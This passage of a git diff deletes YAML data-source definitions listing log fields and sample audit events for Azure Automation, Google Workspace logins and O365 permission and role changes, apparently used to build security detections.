-- claims.http://schemas.microsoft.com/identity/claims/identityprovider
-- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
-- claims.http://schemas.microsoft.com/identity/claims/scope
-- claims.http://schemas.microsoft.com/identity/claims/tenantid
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
-- claims.iat
-- claims.ipaddr
-- claims.iss
-- claims.name
-- claims.nbf
-- claims.puid
-- claims.rh
-- claims.uti
-- claims.ver
-- claims.wids
-- claims.xms_tcdt
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- eventDataId
-- eventName.localizedValue
-- eventName.value
-- eventSource.localizedValue
-- eventSource.value
-- eventTimestamp
-- host
-- id
-- index
-- level
-- linecount
-- object
-- object_id
-- object_path
-- operationId
-- operationName.localizedValue
-- operationName.value
-- product
-- properties.entity
-- properties.eventCategory
-- properties.hierarchy
-- properties.message
-- punct
-- resourceGroupName
-- resourceProviderName.localizedValue
-- resourceProviderName.value
-- resourceUri
-- source
-- sourcetype
-- splunk_server
-- status
-- status.localizedValue
-- status.value
-- subStatus.value
-- submissionTimestamp
-- subscriptionId
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
-- vendor_res_code
-example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/write", "scope": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount"}, "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/", "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661179930", "nbf": "1661179930", "exp": "1661185179", "http://schemas.microsoft.com/claims/authnclassreference": "1", "aio": "AWQAm/8TAAAATFEszAxfULi02mHZwJPr322a2w4m7xjhs9xgc61bVQITM6lcvJI17c8SKQGIWgIA0FysfS1bmLHdxImNfT26qJ5Sfc5UdTncHkz3UYu+AvgCW1gg1mRxOZEFXYdIlQ/h", "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences": "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "evilAdmin@contoso.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname": "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John", "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider": "live.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier": "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.", "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid": "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": "contoso.com#evilAdmin@contoso.com", "uti": "OyNAqM760kmqzxVr6jwtAA", "ver": "1.0", "wids": 
"62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId": "59e3de3b-b8c6-4360-9bc5-f094ebce6422", "description": "", "eventDataId": "b0a0bf02-57e5-4eb3-a36d-f2681d874637", "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource": {"value": "Administrative", "localizedValue": "Administrative"}, "id": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount/events/b0a0bf02-57e5-4eb3-a36d-f2681d874637/ticks/637967777618694806", "level": "Informational", "resourceGroupName": "ResourceGroup1", "resourceProviderName": {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount", "operationId": "6a420172-1ccd-4144-ac12-3095b4019ed5", "operationName": {"value": "Microsoft.Automation/automationAccounts/write", "localizedValue": "Create or Update an Azure Automation account"}, "properties": {"eventCategory": "Administrative", "entity": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount", "message": "Microsoft.Automation/automationAccounts/write", "hierarchy": "67165197-75ea-4ca3-96a5-3e23868eacd0"}, "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value": "", "localizedValue": ""}, "eventTimestamp": "2022-08-22T15:09:21.8694806Z", "submissionTimestamp": "2022-08-22T15:10:51.152208Z", "subscriptionId": "67165197-75ea-4ca3-96a5-3e23868eacd0"}'
diff --git a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml b/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml
deleted file mode 100644
index 8e4233a8ea..0000000000
--- a/data_sources/cloud/event_sources/Azure_Audit_Create_or_Update_an_Azure_Automation_webhook.yml
+++ /dev/null
@@ -1,100 +0,0 @@
-event_name: Azure Audit Create or Update an Azure Automation webhook
-fields:
-- _time
-- authorization.action
-- authorization.scope
-- caller
-- channels
-- claims.aio
-- claims.altsecid
-- claims.appid
-- claims.appidacr
-- claims.aud
-- claims.exp
-- claims.groups
-- claims.http://schemas.microsoft.com/claims/authnclassreference
-- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
-- claims.http://schemas.microsoft.com/identity/claims/identityprovider
-- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
-- claims.http://schemas.microsoft.com/identity/claims/scope
-- claims.http://schemas.microsoft.com/identity/claims/tenantid
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
-- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
-- claims.iat
-- claims.ipaddr
-- claims.iss
-- claims.name
-- claims.nbf
-- claims.puid
-- claims.rh
-- claims.uti
-- claims.ver
-- claims.wids
-- claims.xms_tcdt
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- eventDataId
-- eventName.localizedValue
-- eventName.value
-- eventSource.localizedValue
-- eventSource.value
-- eventTimestamp
-- host
-- httpRequest.clientIpAddress
-- httpRequest.clientRequestId
-- httpRequest.method
-- id
-- index
-- level
-- linecount
-- object
-- object_id
-- object_path
-- operationId
-- operationName.localizedValue
-- operationName.value
-- product
-- properties.entity
-- properties.eventCategory
-- properties.hierarchy
-- properties.message
-- properties.serviceRequestId
-- properties.statusCode
-- punct
-- resourceGroupName
-- resourceProviderName.localizedValue
-- resourceProviderName.value
-- resourceUri
-- result
-- result_id
-- source
-- sourcetype
-- splunk_server
-- src
-- status
-- status.localizedValue
-- status.value
-- subStatus.localizedValue
-- subStatus.value
-- submissionTimestamp
-- subscriptionId
-- timeendpos
-- timestartpos
-- user
-- user_name
-- vendor
-- vendor_product
-- vendor_res_code
-example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/webhooks/write", "scope": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook"}, "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/", "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661287859", "nbf": "1661287859", "exp": "1661293423", "http://schemas.microsoft.com/claims/authnclassreference": "1", "aio": "AWQAm/8TAAAAEendcgWjYQFuDhNNhoecwU3dpXjjenSsIvjamk77+TjLK/o1xkFGcFb1A+OVyuY+xefe0X39n8lx1iFWFqGo0GSNNKhm9OQcv/0UyXiaNIbKD7wisgQhAa9DoIyObMpO", "altsecid": "1:contoso.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences": "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": "evilAdmin@contosol.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname": "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John", "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider": "contoso.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier": "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.", "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid": "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name": "contoso.com#evilAdmin@contoso.com", "uti": "epgtY-85CUeb6aJpaE0KAQ", "ver": 
"1.0", "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId": "74e18a58-ee2e-40de-890d-de0c155f7086", "description": "", "eventDataId": "35b9db88-8041-413e-8dd7-f8dc243eafdd", "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource": {"value": "Administrative", "localizedValue": "Administrative"}, "httpRequest": {"clientRequestId": "6934b40a-c11f-4379-9ef1-c6fa3cee5015", "clientIpAddress": "190.0.0.1", "method": "PUT"}, "id": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook/events/35b9db88-8041-413e-8dd7-f8dc243eafdd/ticks/637968850422707386", "level": "Informational", "resourceGroupName": "eventhub_rg", "resourceProviderName": {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook", "operationId": "74e18a58-ee2e-40de-890d-de0c155f7086", "operationName": {"value": "Microsoft.Automation/automationAccounts/webhooks/write", "localizedValue": "Create or Update an Azure Automation webhook"}, "properties": {"statusCode": "Created", "serviceRequestId": null, "eventCategory": "Administrative", "entity": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook", "message": "Microsoft.Automation/automationAccounts/webhooks/write", "hierarchy": "e0c00901-96b2-4151-80f7-746e24c03e98"}, "status": {"value": "Succeeded", "localizedValue": "Succeeded"}, "subStatus": {"value": "Created", "localizedValue": "Created (HTTP Status Code: 201)"}, "eventTimestamp": "2022-08-23T20:57:22.2707386Z", "submissionTimestamp": 
"2022-08-23T20:58:54.2071536Z", "subscriptionId": "e0c00901-96b2-4151-80f7-746e24c03e98"}'
diff --git a/data_sources/cloud/event_sources/Google_Workspace_login_failure.yml b/data_sources/cloud/event_sources/Google_Workspace_login_failure.yml
deleted file mode 100644
index ff29e025f0..0000000000
--- a/data_sources/cloud/event_sources/Google_Workspace_login_failure.yml
+++ /dev/null
@@ -1,38 +0,0 @@
-event_name: Google Workspace login_failure
-fields:
-- _time
-- actor.email
-- actor.profileId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- etag
-- event.name
-- event.parameters{}.multiValue{}
-- event.parameters{}.name
-- event.parameters{}.value
-- event.type
-- eventtype
-- host
-- id.applicationName
-- id.customerId
-- id.time
-- id.uniqueQualifier
-- index
-- ipAddress
-- kind
-- linecount
-- punct
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-12T01:05:35.119Z", "uniqueQualifier": "720229394436", "applicationName": "login", "customerId": "C046r85ir"}, "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/_lixtTooT11WXorGf6w6ElN0m0g\"", "actor": {"email": "user29@daftpunk.com", "profileId": "114679690119024644513"}, "ipAddress": "141.254.89.27", "event": {"type": "login", "name": "login_failure", "parameters": [{"name": "login_type", "value": "unknown"}, {"name": "login_challenge_method", "multiValue": ["password"]}]}}'
diff --git a/data_sources/cloud/event_sources/Google_Workspace_login_success.yml b/data_sources/cloud/event_sources/Google_Workspace_login_success.yml
deleted file mode 100644
index e443b32f74..0000000000
--- a/data_sources/cloud/event_sources/Google_Workspace_login_success.yml
+++ /dev/null
@@ -1,36 +0,0 @@
-event_name: Google Workspace login_success
-fields:
-- _time
-- actor.email
-- actor.profileId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- etag
-- event.name
-- event.parameters{}.boolValue
-- event.parameters{}.multiValue{}
-- event.parameters{}.name
-- event.parameters{}.value
-- event.type
-- host
-- id.applicationName
-- id.customerId
-- id.time
-- id.uniqueQualifier
-- index
-- ipAddress
-- kind
-- linecount
-- punct
-- source
-- sourcetype
-- splunk_server
-- timeendpos
-- timestartpos
-example_log: '{"kind": "admin#reports#activity", "id": {"time": "2022-10-13T20:57:35.833Z", "uniqueQualifier": "437744618349", "applicationName": "login", "customerId": "C046r85ir"}, "etag": "\"JCPRxFaiNR1s5TJ6ecIH8OpGdY4efiOYXbIB65itOzY/OgAbD-Tz8hSD1vUJWw7NLiJ5SF4\"", "actor": {"email": "user1@splunkresearch.com", "profileId": "112184723778873345717"}, "ipAddress": "45.23.129.123", "event": {"type": "login", "name": "login_success", "parameters": [{"name": "login_type", "value": "google_password"}, {"name": "login_challenge_method", "multiValue": ["password", "password", "password", "password", "password"]}, {"name": "is_suspicious", "boolValue": false}]}}'
diff --git a/data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml b/data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml
deleted file mode 100644
index 84ac90b468..0000000000
--- a/data_sources/cloud/event_sources/O365_Add-MailboxPermission.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: O365 Add-MailboxPermission
-fields:
-- _time
-- AccessRights
-- AppId
-- ClientAppId
-- ClientIP
-- CreationTime
-- ExternalAccess
-- Id
-- Identity
-- InheritanceType
-- ObjectId
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- Parameters{}.Name
-- Parameters{}.Value
-- RecordType
-- ResultStatus
-- SessionId
-- User
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.159.234.121:30395", "CreationTime": "2020-12-15T10:18:53", "ExternalAccess": false, "Id": "bb6e31a3-e98f-493d-bbff-08d8a0e2d2b0", "ObjectId": "jhernan", "Operation": "Add-MailboxPermission", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341 (15.20.3654.025)", "Parameters": [{"Name": "Identity", "Value": "jhernan"}, {"Name": "User", "Value": "Patrick Bareiss"}, {"Name": "AccessRights", "Value": "FullAccess"}, {"Name": "InheritanceType", "Value": "All"}], "RecordType": 1, "ResultStatus": "True", "SessionId": "2be46662-a743-4a05-8744-c2f75f886512", "UserId": "pbareiss@rodsoto.onmicrosoft.com", "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user.yml b/data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user.yml
deleted file mode 100644
index 473a95fd40..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_grant_to_user.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: O365 Add app role assignment grant to user.
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- ClientIP
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- extended_properties
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- status
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"Actor": [{"ID": "rodsoto@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "10037FFEA938FB92", "Type": 3}, {"ID": "74658136-14ec-4630-ad9b-26e160ff0fc6", "Type": 2}, {"ID": "User_bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "bfb8c366-0406-41a5-b3e3-328f4a3b4484", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress": "40.124.84.4", "AzureActiveDirectoryEventType": 1, "ClientIP": "40.124.84.4", "CreationTime": "2021-01-19T22:21:39", "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "Id": "8b9e5417-c310-4382-89da-c0f25c5c0576", "InterSystemsId": "85c80877-c529-4487-8f44-48760767cc6c", "IntraSystemId": "6fc81447-9c94-4734-8bd7-307bb699c04e", "ModifiedProperties": [{"Name": "AppRole.Id", "NewValue": "97edced9-9f34-4eef-9b49-84a5ebcd5167", "OldValue": ""}, {"Name": "AppRole.Value", "NewValue": "arn:aws:iam::111111111111:role/rodonmicrotestrole,arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft", "OldValue": ""}, {"Name": "AppRole.DisplayName", "NewValue": "rodonmicrotestrole,rodsotoonmicrosoft", "OldValue": ""}, {"Name": "User.ObjectID", "NewValue": "7646f1a9-620c-4630-b5e4-b02838be5562", "OldValue": ""}, {"Name": "User.UPN", "NewValue": "vagrant@rodsoto.onmicrosoft.com", "OldValue": ""}, {"Name": "User.PUID", "NewValue": "100320010972E450", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88", "OldValue": ""}], "ObjectId": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88", "Operation": "Add app role assignment grant to user.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "RecordType": 8, "ResultStatus": "Success", "SupportTicketId": "", "Target": [{"ID": "ServicePrincipal_9fd10db9-dfe2-4d74-a724-c837eb8764d9", "Type": 2}, {"ID": "9fd10db9-dfe2-4d74-a724-c837eb8764d9", 
"Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Amazon Web Services (AWS)", "Type": 1}, {"ID": "3e71560f-3e31-45ab-b439-46328fe55b88", "Type": 2}, {"ID": "https://signin.aws.amazon.com/saml;3e71560f-3e31-45ab-b439-46328fe55b88", "Type": 4}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId": "rodsoto@rodsoto.onmicrosoft.com", "UserKey": "10037FFEA938FB92@rodsoto.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal.yml b/data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal.yml
deleted file mode 100644
index ad185d9dee..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_app_role_assignment_to_service_principal.yml
+++ /dev/null
@@ -1,71 +0,0 @@
-event_name: O365 Add app role assignment to service principal.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2024-02-08T21:49:53", "Id": "a6bee61d-8b3f-42e1-b4fa-778fb05c43ac", "Operation": "Add app role assignment to service principal.", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 8, "ResultStatus": "Success", "UserKey": "Not Available", "UserType": 4, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com", "UserId": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:28:58 PST 2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4\",\"AppId\":\"00000002-0000-0ff1-ce00-000000000000\"}"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}], "ModifiedProperties": [{"Name": "AppRole.Id", "NewValue": "dc890d15-9560-4a4c-9b7f-a736ec74ec40", "OldValue": ""}, {"Name": "AppRole.Value", "NewValue": "full_access_as_app", "OldValue": ""}, {"Name": "AppRole.DisplayName", "NewValue": "Use Exchange Web Services with full access to all mailboxes", "OldValue": ""}, {"Name": 
"AppRoleAssignment.CreatedDateTime", "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "AppRoleAssignment.LastModifiedDateTime", "NewValue": "2/8/2024 9:49:53 PM", "OldValue": ""}, {"Name": "ServicePrincipal.ObjectID", "NewValue": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "OldValue": ""}, {"Name": "ServicePrincipal.DisplayName", "NewValue": "STRT_Oauth", "OldValue": ""}, {"Name": "ServicePrincipal.AppId", "NewValue": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "ServicePrincipal.Name", "NewValue": "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "OldValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "NewValue": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com", "OldValue": ""}], "Actor": [{"ID": "LegacyTestOAuthApp", "Type": 1}, {"ID": "869dc64b-95b2-4003-8098-3ba39296ea46", "Type": 2}, {"ID": "ServicePrincipal_fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type": 2}, {"ID": "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "InterSystemsId": "ed53faec-49b5-444f-b6af-b928558ca433", "IntraSystemId": "00000000-0000-0000-0000-000000000000", "SupportTicketId": "", "Target": [{"ID": 
"ServicePrincipal_8429eb5c-faeb-4ade-8eac-acc003790769", "Type": 2}, {"ID": "8429eb5c-faeb-4ade-8eac-acc003790769", "Type": 2}, {"ID": "ServicePrincipal", "Type": 2}, {"ID": "Office 365 Exchange Online", "Type": 1}, {"ID": "00000002-0000-0ff1-ce00-000000000000", "Type": 2}, {"ID": "https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com", "Type": 4}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4"}'
diff --git a/data_sources/cloud/event_sources/O365_Add_member_to_role.yml b/data_sources/cloud/event_sources/O365_Add_member_to_role.yml
deleted file mode 100644
index 05df9d0465..0000000000
--- a/data_sources/cloud/event_sources/O365_Add_member_to_role.yml
+++ /dev/null
@@ -1,74 +0,0 @@
-event_name: O365 Add member to role.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
